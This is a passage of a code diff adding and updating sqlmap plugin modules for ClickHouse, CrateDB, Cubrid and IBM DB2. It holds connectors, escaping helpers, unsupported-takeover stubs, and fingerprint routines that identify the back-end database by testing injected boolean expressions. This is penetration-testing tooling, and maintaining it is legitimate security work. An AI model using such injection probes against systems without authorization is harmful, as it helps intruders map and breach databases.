SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Cache it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/clickhouse/__init__.py b/plugins/dbms/clickhouse/__init__.py new file mode 100755 index 00000000000..ff10ae10c88 --- /dev/null +++ b/plugins/dbms/clickhouse/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import CLICKHOUSE_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.clickhouse.enumeration import Enumeration +from plugins.dbms.clickhouse.filesystem import Filesystem +from plugins.dbms.clickhouse.fingerprint import Fingerprint +from plugins.dbms.clickhouse.syntax import Syntax +from plugins.dbms.clickhouse.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class ClickHouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines ClickHouse methods + """ + + def __init__(self): + self.excludeDbsList = CLICKHOUSE_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.CLICKHOUSE] = Syntax.escape diff --git a/plugins/dbms/clickhouse/connector.py b/plugins/dbms/clickhouse/connector.py new file mode 100755 index 00000000000..83a868de757 --- /dev/null +++ b/plugins/dbms/clickhouse/connector.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + pass diff --git a/plugins/dbms/clickhouse/enumeration.py b/plugins/dbms/clickhouse/enumeration.py new file mode 100755 index 00000000000..8c12e1aad5a --- /dev/null +++ b/plugins/dbms/clickhouse/enumeration.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on ClickHouse it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on ClickHouse it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} diff --git a/plugins/dbms/clickhouse/filesystem.py b/plugins/dbms/clickhouse/filesystem.py new file mode 100755 index 00000000000..5be3e8a779d --- /dev/null +++ b/plugins/dbms/clickhouse/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on ClickHouse it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on ClickHouse it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/clickhouse/fingerprint.py b/plugins/dbms/clickhouse/fingerprint.py new file mode 100755 index 00000000000..1419d4dc62e --- /dev/null +++ b/plugins/dbms/clickhouse/fingerprint.py @@ -0,0 +1,91 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import CLICKHOUSE_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.CLICKHOUSE) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.CLICKHOUSE + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(CLICKHOUSE_ALIASES): + setDbms(DBMS.CLICKHOUSE) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.CLICKHOUSE + logger.info(infoMsg) + + result = inject.checkBooleanExpression("halfMD5('abcd')='16356072519128051347'") + + if result: + infoMsg = "confirming %s" % DBMS.CLICKHOUSE + logger.info(infoMsg) + result = inject.checkBooleanExpression("generateUUIDv4(1)!=generateUUIDv4(2)") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE + logger.warning(warnMsg) + + return False + + setDbms(DBMS.CLICKHOUSE) + self.getBanner() + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.CLICKHOUSE + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/clickhouse/syntax.py b/plugins/dbms/clickhouse/syntax.py new file mode 100755 index 00000000000..93da628052a --- /dev/null +++ b/plugins/dbms/clickhouse/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT char(97)||char(98)||char(99)||char(100)||char(101)||char(102)||char(103)||char(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("char(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/clickhouse/takeover.py b/plugins/dbms/clickhouse/takeover.py new file mode 100755 index 00000000000..6e16590937b --- /dev/null +++ b/plugins/dbms/clickhouse/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on ClickHouse it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on ClickHouse it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on ClickHouse it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on ClickHouse it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/cratedb/__init__.py b/plugins/dbms/cratedb/__init__.py new file mode 100644 index 00000000000..c9e2259bf0d --- /dev/null +++ b/plugins/dbms/cratedb/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import CRATEDB_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.cratedb.enumeration import Enumeration +from plugins.dbms.cratedb.filesystem import Filesystem +from plugins.dbms.cratedb.fingerprint import Fingerprint +from plugins.dbms.cratedb.syntax import Syntax +from plugins.dbms.cratedb.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class CrateDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines CrateDB methods + """ + + def __init__(self): + self.excludeDbsList = CRATEDB_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.CRATEDB] = Syntax.escape diff --git a/plugins/dbms/cratedb/connector.py b/plugins/dbms/cratedb/connector.py new file mode 100644 index 00000000000..0c5e5436180 --- /dev/null +++ b/plugins/dbms/cratedb/connector.py @@ -0,0 +1,73 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import psycopg2 + import psycopg2.extensions + psycopg2.extensions.register_type(psycopg2.extensions.UNICODE) + psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY) +except: + pass + +from lib.core.common import getSafeExString +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: http://initd.org/psycopg/ + User guide: http://initd.org/psycopg/docs/ + API: http://initd.org/psycopg/docs/genindex.html + Debian package: python-psycopg2 + License: GPL + + Possible connectors: http://wiki.python.org/moin/PostgreSQL + """ + + def connect(self): + self.initConnection() + + try: + self.connector = psycopg2.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port) + except psycopg2.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.set_client_encoding('UNICODE') + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except psycopg2.ProgrammingError as ex: + logger.warning(getSafeExString(ex)) + return None + + def execute(self, query): + retVal = False + + try: + self.cursor.execute(query) + retVal = True + except (psycopg2.OperationalError, psycopg2.ProgrammingError) as ex: + logger.warning(("(remote) '%s'" % getSafeExString(ex)).strip()) + except psycopg2.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + return retVal + + def select(self, query): + retVal = None + + if self.execute(query): + retVal = self.fetchall() + + return retVal diff --git a/plugins/dbms/cratedb/enumeration.py b/plugins/dbms/cratedb/enumeration.py new file mode 100644 index 00000000000..4c9e66b39e2 --- /dev/null +++ b/plugins/dbms/cratedb/enumeration.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on CrateDB it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on CrateDB it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} diff --git a/plugins/dbms/cratedb/filesystem.py b/plugins/dbms/cratedb/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/cratedb/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/cratedb/fingerprint.py b/plugins/dbms/cratedb/fingerprint.py new file mode 100644 index 00000000000..7a6b6f545df --- /dev/null +++ b/plugins/dbms/cratedb/fingerprint.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import CRATEDB_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.CRATEDB) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.CRATEDB + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(CRATEDB_ALIASES): + setDbms(DBMS.CRATEDB) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.CRATEDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("IGNORE3VL(NULL IS NULL)") + + if result: + infoMsg = "confirming %s" % DBMS.CRATEDB + logger.info(infoMsg) + + result = inject.checkBooleanExpression("1~1") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.CRATEDB + logger.warning(warnMsg) + + return False + + setDbms(DBMS.CRATEDB) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.CRATEDB + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/cratedb/syntax.py b/plugins/dbms/cratedb/syntax.py new file mode 100644 index 00000000000..17a0a02c257 --- /dev/null +++ b/plugins/dbms/cratedb/syntax.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT 'abcdefgh' FROM foobar" + True + """ + + return expression diff --git a/plugins/dbms/cratedb/takeover.py b/plugins/dbms/cratedb/takeover.py new file mode 100644 index 00000000000..0e8b86c004c --- /dev/null +++ b/plugins/dbms/cratedb/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on CrateDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on CrateDB it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on CrateDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on CrateDB it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/cubrid/__init__.py b/plugins/dbms/cubrid/__init__.py new file mode 100644 index 00000000000..d5aedaf3c04 --- /dev/null +++ b/plugins/dbms/cubrid/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import CUBRID_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.cubrid.enumeration import Enumeration +from plugins.dbms.cubrid.filesystem import Filesystem +from plugins.dbms.cubrid.fingerprint import Fingerprint +from plugins.dbms.cubrid.syntax import Syntax +from plugins.dbms.cubrid.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class CubridMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Cubrid methods + """ + + def __init__(self): + self.excludeDbsList = CUBRID_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.CUBRID] = Syntax.escape diff --git a/plugins/dbms/cubrid/connector.py b/plugins/dbms/cubrid/connector.py new file mode 100644 index 00000000000..76aa9ea390c --- /dev/null +++ b/plugins/dbms/cubrid/connector.py @@ -0,0 +1,59 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import CUBRIDdb +except: + pass + +import logging + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/CUBRID/cubrid-python + User guide: https://github.com/CUBRID/cubrid-python/blob/develop/README.md + API: https://www.python.org/dev/peps/pep-0249/ + License: BSD License + """ + + def connect(self): + self.initConnection() + + try: + self.connector = CUBRIDdb.connect(hostname=self.hostname, username=self.user, password=self.password, database=self.db, port=self.port, connect_timeout=conf.timeout) + except CUBRIDdb.DatabaseError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except CUBRIDdb.DatabaseError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + try: + self.cursor.execute(query) + except CUBRIDdb.DatabaseError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except CUBRIDdb.Error as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + def select(self, query): + self.execute(query) + return self.fetchall() diff --git a/plugins/dbms/cubrid/enumeration.py b/plugins/dbms/cubrid/enumeration.py new file mode 100644 index 00000000000..142b170108a --- /dev/null +++ b/plugins/dbms/cubrid/enumeration.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on Cubrid it is not possible to enumerate password hashes" + logger.warning(warnMsg) + + return {} + + def getStatements(self): + warnMsg = "on Cubrid it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] + + def getRoles(self, *args, **kwargs): + warnMsg = "on Cubrid it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on Cubrid it is not possible to enumerate the hostname" + logger.warning(warnMsg) diff --git a/plugins/dbms/cubrid/filesystem.py b/plugins/dbms/cubrid/filesystem.py new file mode 100644 index 00000000000..2e61d83c07c --- /dev/null +++ b/plugins/dbms/cubrid/filesystem.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/cubrid/fingerprint.py b/plugins/dbms/cubrid/fingerprint.py new file mode 100644 index 00000000000..9d1a16c151d --- /dev/null +++ b/plugins/dbms/cubrid/fingerprint.py @@ -0,0 +1,94 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import CUBRID_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.CUBRID) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.CUBRID + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(CUBRID_ALIASES): + setDbms(DBMS.CUBRID) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.CUBRID + logger.info(infoMsg) + + result = inject.checkBooleanExpression("{} SUBSETEQ (CAST ({} AS SET))") + + if result: + infoMsg = "confirming %s" % DBMS.CUBRID + logger.info(infoMsg) + + result = inject.checkBooleanExpression("DRAND()<2") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.CUBRID + logger.warning(warnMsg) + + return False + + setDbms(DBMS.CUBRID) + + self.getBanner() + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.CUBRID + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/cubrid/syntax.py b/plugins/dbms/cubrid/syntax.py new file mode 100644 index 00000000000..070abcd25b3 --- /dev/null +++ b/plugins/dbms/cubrid/syntax.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> from lib.core.common import Backend + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/cubrid/takeover.py b/plugins/dbms/cubrid/takeover.py new file mode 100644 index 00000000000..cb140d6c9c5 --- /dev/null +++ b/plugins/dbms/cubrid/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Cubrid it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Cubrid it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Cubrid it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Cubrid it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/db2/__init__.py b/plugins/dbms/db2/__init__.py index 61494a9cdd9..9b70ae438ab 100644 --- a/plugins/dbms/db2/__init__.py +++ b/plugins/dbms/db2/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import DBMS @@ -24,11 +24,7 @@ class DB2Map(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeov def __init__(self): self.excludeDbsList = DB2_SYSTEM_DBS - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) + for cls in self.__class__.__bases__: + cls.__init__(self) unescaper[DBMS.DB2] = Syntax.escape diff --git a/plugins/dbms/db2/connector.py b/plugins/dbms/db2/connector.py index 797593178ed..0a8e96b7a34 100644 --- a/plugins/dbms/db2/connector.py +++ b/plugins/dbms/db2/connector.py @@ -1,17 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: import ibm_db_dbi -except ImportError: +except: pass import logging +from lib.core.common import getSafeExString from lib.core.data import conf from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -19,42 +20,38 @@ class Connector(GenericConnector): """ - Homepage: http://code.google.com/p/ibm-db/ - User guide: http://code.google.com/p/ibm-db/wiki/README - API: http://www.python.org/dev/peps/pep-0249/ + Homepage: https://github.com/ibmdb/python-ibmdb + User guide: https://github.com/ibmdb/python-ibmdb/wiki/README + API: https://www.python.org/dev/peps/pep-0249/ License: Apache License 2.0 """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): self.initConnection() try: database = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=%s;HOSTNAME=%s;PORT=%s;PROTOCOL=TCPIP;" % (self.db, self.hostname, self.port) self.connector = ibm_db_dbi.connect(database, self.user, self.password) - except ibm_db_dbi.OperationalError, msg: - raise SqlmapConnectionException(msg) - + except ibm_db_dbi.OperationalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except ibm_db_dbi.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) + except ibm_db_dbi.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) return None def execute(self, query): try: self.cursor.execute(query) - except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except ibm_db_dbi.InternalError, msg: - raise SqlmapConnectionException(msg[1]) + except (ibm_db_dbi.OperationalError, ibm_db_dbi.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) '%s'" % getSafeExString(ex)) + except ibm_db_dbi.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.commit() diff --git a/plugins/dbms/db2/enumeration.py b/plugins/dbms/db2/enumeration.py index a7d78326381..3a6c3599e35 100644 --- a/plugins/dbms/db2/enumeration.py +++ b/plugins/dbms/db2/enumeration.py @@ -1,21 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ - from lib.core.data import logger from plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getPasswordHashes(self): - warnMsg = "on DB2 it is not possible to list password hashes" - logger.warn(warnMsg) + warnMsg = "on IBM DB2 it is not possible to enumerate password hashes" + logger.warning(warnMsg) return {} + def getStatements(self): + warnMsg = "on IBM DB2 it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/db2/filesystem.py b/plugins/dbms/db2/filesystem.py index 8df147edb8b..2e61d83c07c 100644 --- a/plugins/dbms/db2/filesystem.py +++ b/plugins/dbms/db2/filesystem.py @@ -1,12 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) + pass diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py index 997b319028e..aa12d2ed11a 100644 --- a/plugins/dbms/db2/fingerprint.py +++ b/plugins/dbms/db2/fingerprint.py @@ -1,14 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ - from lib.core.common import Backend from lib.core.common import Format -from lib.core.common import randomInt +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -65,14 +64,16 @@ def getFingerprint(self): value += DBMS.DB2 return value - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % 